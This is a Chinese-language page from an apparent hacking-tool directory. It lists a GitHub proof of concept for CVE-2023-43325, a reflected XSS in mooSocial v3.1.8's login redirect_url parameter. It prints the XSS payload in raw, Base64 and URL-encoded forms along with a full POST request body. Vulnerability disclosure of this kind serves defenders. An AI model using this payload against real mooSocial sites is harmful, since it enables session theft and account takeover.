Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/ahrixia/cve-2023-43325
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubahrixia/cve-2023-43325

CVE-2023-43325

mooSocial v3.1.8 存在跨站脚本漏洞,涉及用户登录功能。

查看仓库
12年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

mooSocial: XSS(CVE-2023-43325)

mooSocial v3.1.8 的用户登录功能中的 data[redirect_url] 参数存在反射型跨站脚本(XSS)漏洞,攻击者可通过精心构造的 URL 窃取用户的会话 cookie 并冒充其账户。

漏洞参数:data[redirect_url]

利用 - 概念验证(POC)

反射型跨站脚本(XSS)

root@kitploit:~
Payload:test">test 
Payload(Base64 编码):dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
最终 Payload(Base64+URL 编码):dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d

针对 /moosocial/users/login 的 POST 请求(仅 POST 请求数据):

root@kitploit:~
[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[已编辑]&data%5Bremember%5D=0]

截图

image

下载工具